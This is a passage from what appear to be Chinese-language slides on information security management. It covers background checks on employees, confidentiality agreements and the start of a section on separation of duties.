34、可以請(qǐng)求訪問申請(qǐng)人的信用和犯罪記錄，甚至可以聘請(qǐng)外部公司對(duì)申請(qǐng)人進(jìn)行調(diào)查，以確定是否存在潛在問題或利益沖突。 通過背景檢查，可以防止： 因?yàn)槿藛T解雇而導(dǎo)致法律訴訟 因?yàn)楣陀檬韬龆鴮?dǎo)致第三方的法律訴訟 雇用不合格的人員 喪失商業(yè)秘密 員工從一般崗位轉(zhuǎn)入信息安全重要崗位，組織也應(yīng)當(dāng)對(duì)其進(jìn)行檢查，對(duì)于處在有相當(dāng)權(quán)力位置的人員，這種檢查應(yīng)定期進(jìn)行。背景檢查（BACKGROUND CHECK）第80頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 組織應(yīng)與所有員工簽訂保密協(xié)議，作為雇用合同基本條款的一部分 保密協(xié)議應(yīng)明確規(guī)定雇員對(duì)組織信息安全的責(zé)任、保密要求及違約的法律責(zé)任 簽訂保密承諾旨在加強(qiáng)員工對(duì)組織信息安全應(yīng)承擔(dān)的責(zé)任，協(xié)議上應(yīng)有員工的簽名并由其保存一份協(xié)議副本 對(duì)于處于試用期的新員工，要求其簽訂一份保密承諾 在允許第三方用戶使用信息處理設(shè)施之前，要求其簽訂保密協(xié)議 當(dāng)雇用期或合同期有更改，特別是雇員到期離職或合同終止時(shí)，應(yīng)重申保密協(xié)議保密協(xié)議（ CONFIDENTIALITY AGREEMENT ）第81頁，共88頁，2022年，5月20日，16點(diǎn)35分，星期一 職務(wù)分離（Separation of Duties），將一個(gè)